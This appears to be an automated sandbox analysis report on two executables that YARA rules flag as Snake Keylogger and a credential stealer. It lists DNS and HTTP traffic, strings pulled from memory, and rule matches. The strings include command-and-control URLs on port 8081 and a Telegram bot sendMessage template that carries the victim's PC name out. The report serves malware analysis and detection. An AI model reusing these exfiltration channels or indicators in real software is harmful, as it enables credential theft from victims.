Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtppro.zoho.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 15:33:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 15:33:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000303D000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.000000000359E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000304F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3356477752.00000000065F0000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3355856307.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000304F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3356477752.00000000065F0000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3355856307.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: ZTEIhNCtP3.exe, HgKRLOctZksk.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: ZTEIhNCtP3.exe, HgKRLOctZksk.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000304F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3356477752.00000000065F0000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3355856307.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ZTEIhNCtP3.exe, HgKRLOctZksk.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000304F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3356477752.00000000065F0000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3355856307.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0B
Source: ZTEIhNCtP3.exe, 00000000.00000002.907804109.000000000295B000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.941437829.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000303D000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.000000000359E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtppro.zoho.com
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000303D000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.000000000359E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtppro.zoho.comd
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000304F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3356477752.00000000065F0000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3355856307.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://status.thawte.com0:
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000304F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3356477752.00000000065F0000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3355856307.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3342388529.0000000000436000.00000040.00000400.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20a
Source: HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000003F13000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000004168000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.00000000046C7000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000003F13000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000004168000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.00000000046C7000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000003F13000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000004168000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.00000000046C7000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000D.00000003.1203723780.0000018F14C70000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: qmgr.db.13.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003495000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.000000000346E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: ZTEIhNCtP3.exe, 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000000.00000002.909326738.0000000003975000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3342384845.000000000042F000.00000040.00000400.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 00000008.00000002.944100988.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000033FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002EC9000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003495000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.000000000346E000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: ZTEIhNCtP3.exe, HgKRLOctZksk.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: ZTEIhNCtP3.exe, 00000007.00000002.3343972937.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000304F000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3356477752.00000000065F0000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3355856307.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3345458212.000000000179D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000003F13000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000004168000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.00000000046C7000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000003F13000.00000004.00000800.00020000.00000000.sdmp, ZTEIhNCtP3.exe, 00000007.00000002.3353159943.0000000004168000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.00000000046C7000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3352130970.0000000004472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003573000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.0000000003012000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.0000000003573000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: ZTEIhNCtP3.exe, 00000007.00000002.3347129750.000000000300D000.00000004.00000800.00020000.00000000.sdmp, HgKRLOctZksk.exe, 0000000C.00000002.3346673998.000000000356E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49719 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.ZTEIhNCtP3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.HgKRLOctZksk.exe.3c45e40.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ZTEIhNCtP3.exe.41e3440.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
